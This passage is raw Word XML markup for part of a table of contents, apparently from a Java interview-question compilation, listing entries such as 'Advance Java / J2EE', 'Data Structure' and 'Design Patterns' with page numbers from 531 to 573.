            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>531</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="636F4AB4" w14:textId="025FB88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7867610 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>533</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F91B7C7" w14:textId="31D0CD4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7867611 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>535</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="544425B5" w14:textId="0562D42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7867612 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>536</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5567777B" w14:textId="2591166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7867613 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>538</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D5F84A5" w14:textId="2AA1001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7867614 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>539</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54709B69" w14:textId="1A390E9F"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15" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advance Java / J2EE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867615 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>540</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F06F384" w14:textId="0B30C2B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ervlet?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867616 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>540</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48B91021" w14:textId="75178FB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7867617 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>540</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7EACA185" w14:textId="6EEA7B5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7867618 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>541</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FBD5BDC" w14:textId="5F4D0C9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JSP?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867619 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>542</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E79DA2A" w14:textId="7E2F349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7867620 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>543</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03B375E5" w14:textId="52EAFCC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7867621 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>543</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16BE969B" w14:textId="102406B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7867622 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>544</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28A46591" w14:textId="13A0DB5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7867623 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>545</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45D93A6D" w14:textId="666CCFC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7867624 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>546</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39A33DC4" w14:textId="66DED29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7867625 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>548</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46855DB2" w14:textId="33F1FAF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7867626 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>549</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0568592C" w14:textId="746D39D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7867627 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>550</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F31A8DB" w14:textId="5DA5A1D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7867628 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>551</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F27920D" w14:textId="0383C2F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7867629 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>551</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C1AFB47" w14:textId="4945C26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7867630 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>553</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2226A4B1" w14:textId="1C94EAE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7867631 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>554</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F88E23B" w14:textId="7157B39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7867632 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>556</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="015BD9AA" w14:textId="5E5B1A5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7867633 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>557</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BB9F546" w14:textId="2819813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7867634 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>559</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68033FD7" w14:textId="1665598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7867635 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>560</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FB5165C" w14:textId="0B5EE8C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7867636 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>564</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4127BFE8" w14:textId="74B32392"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37" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Data Structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867637 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>566</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CFA041E" w14:textId="1F3B7B9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7867638 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>566</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E7CCEC4" w14:textId="68E9D10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7867639 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>566</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6514DCD7" w14:textId="1E53D23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7867640 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>567</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C690150" w14:textId="71FA13E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7867641 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>568</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="136458C5" w14:textId="4465E08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7867642 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>569</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BAE370A" w14:textId="414103AA"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43" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Design Patterns</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867643 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>571</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35823A53" w14:textId="226D4CB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Design pattern? Explain all design pattern??</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867644 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>571</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="600444C3" w14:textId="3D0888B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7867645 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>572</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1ECED90A" w14:textId="0BD2DEF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7867646 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>573</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00691334" w14:textId="0BEECCA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7867647 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
